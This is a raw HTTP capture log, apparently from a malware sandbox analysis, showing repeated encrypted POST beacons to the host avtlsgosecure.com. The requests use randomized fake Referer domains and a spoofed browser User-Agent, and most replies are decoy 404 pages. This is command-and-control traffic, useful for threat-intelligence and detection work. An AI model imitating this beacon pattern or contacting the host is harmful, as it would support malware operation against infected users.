                                                                                                                                  Oct 17, 2022 22:07:20.761863947 CEST6855OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d1 66 9d 02 1f d3 27 f2 fe 75 c2 1f 3c 18
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f'u<PE'u1CAl`p^IGZPox%ray5hf.$q^ ti/6fA_?5u#CnGH&(2I
                                                                                                                                  Oct 17, 2022 22:07:20.876308918 CEST6856INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:20 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:21.122860909 CEST6856OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tekxbw.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 336
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:21.122947931 CEST6856OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 9c 02 1f d3 26 f2 fe 75 cd 16 56 47
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&uVGv7dZ^x%>AY`_4L}^1q)~c}HF3B~QgQ#!k`}4fpq5?!hE8Z3[Ai]3~.#z$%a}!
                                                                                                                                  Oct 17, 2022 22:07:21.237842083 CEST6857INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:21 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 39
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 c6 a4 83 ec 24
                                                                                                                                  Data Ascii: %S`Nh&WQY^]eu$
                                                                                                                                  Oct 17, 2022 22:07:24.214032888 CEST7358OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://vwbkimlhg.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 164
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.214032888 CEST7358OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d1 66 9c 02 1f d3 27 f2 fe 75 bb 66 44 12
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f'ufD*'BP!M]/l7SA-L/B,THT7XdJ%"mYs+gO"+
                                                                                                                                  Oct 17, 2022 22:07:24.327697992 CEST7359INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:24.366924047 CEST7360OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ksedxblf.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 171
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.366924047 CEST7360OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 9b 02 1f d3 26 f2 fe 75 df 4d 1a 0b
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&uM(R~'$h|(UcYF#zhDa(FNVwSz*fR${?HM{r5
                                                                                                                                  Oct 17, 2022 22:07:24.480665922 CEST7365INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:24.512083054 CEST7366OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bvenxtm.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 198
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.513552904 CEST7366OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 9a 02 1f d3 26 f2 fe 75 cb 6f 5a 36
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&uoZ6.ZEkdYaVRe9 @f*0pzUm]$ZV2^7.pg:,F[DF,F&;Vl>&F57>[
                                                                                                                                  Oct 17, 2022 22:07:24.628086090 CEST7371INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:24.642550945 CEST7373OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://wxsohsstcq.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 236
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.642551899 CEST7373OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 99 02 1f d3 26 f2 fe 75 b5 7d 09 10
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&u}?ENFSH'2*KA0uN7wT-=3Zic?"ulZwj*`?.D>mRiue=ID'7#K^r]3Yji3U&{~ #Dk7%
                                                                                                                                  Oct 17, 2022 22:07:24.757271051 CEST7373INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 91
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba f2 18 36 9d ba 91 a4 33 b2 84 c1 ee 22 8f 42 93 aa 2f 7d d3 72 49 97 04 74 b1 d6 88 1f 82 f7 47 df b5 ce e2 3a bd 07 22 c5 83 a1 a4 b4 f8 6e fc 00 8f 21 a4 c7 f0 3a 57 2a 14 4c 94
                                                                                                                                  Data Ascii: %S`Nh&WQY^&63"B/}rItG:"n!:W*L
                                                                                                                                  Oct 17, 2022 22:07:25.282048941 CEST7665OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://yclscqegh.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 203
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.282495975 CEST7665OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 98 02 1f d3 26 f2 fe 75 f2 67 28 45
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&ug(E5(E&C>F|&9b)@='PS2e\(4n_j3_b=a#b4~<E Y)o]ny(0,@xbg
                                                                                                                                  Oct 17, 2022 22:07:25.398344994 CEST7665INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:25.482798100 CEST7666OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dcxytihxr.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 362
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.482798100 CEST7666OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 87 02 1f d3 26 f2 fe 75 bc 44 13 0f
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&uD{eRIGAl#paxWULY_1Pcd;QZRh%v1F5m"7a}WouA(b+G;7>+y*nIj^cz?\eiZVj
                                                                                                                                  Oct 17, 2022 22:07:25.596513033 CEST7668INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:25.655810118 CEST7668OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://btqtaywr.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 361
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.655889034 CEST7668OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 86 02 1f d3 26 f2 fe 75 ef 78 5f 1e
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&ux_|EJ7I&9R5S:}S'(FL~{8qc3IT@M.q(Js{g2OQ|!6#0O,}[iy!UpqEAOKn +|
                                                                                                                                  Oct 17, 2022 22:07:25.771318913 CEST7670INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:25.818156958 CEST7670OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://xixace.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 166
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.818192005 CEST7671OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 85 02 1f d3 26 f2 fe 75 f1 5b 13 39
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&u[9[{^9"Lz7xKHQfD]jr'$PsHyQ"e&n7-d$+NI
                                                                                                                                  Oct 17, 2022 22:07:25.931803942 CEST7672INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
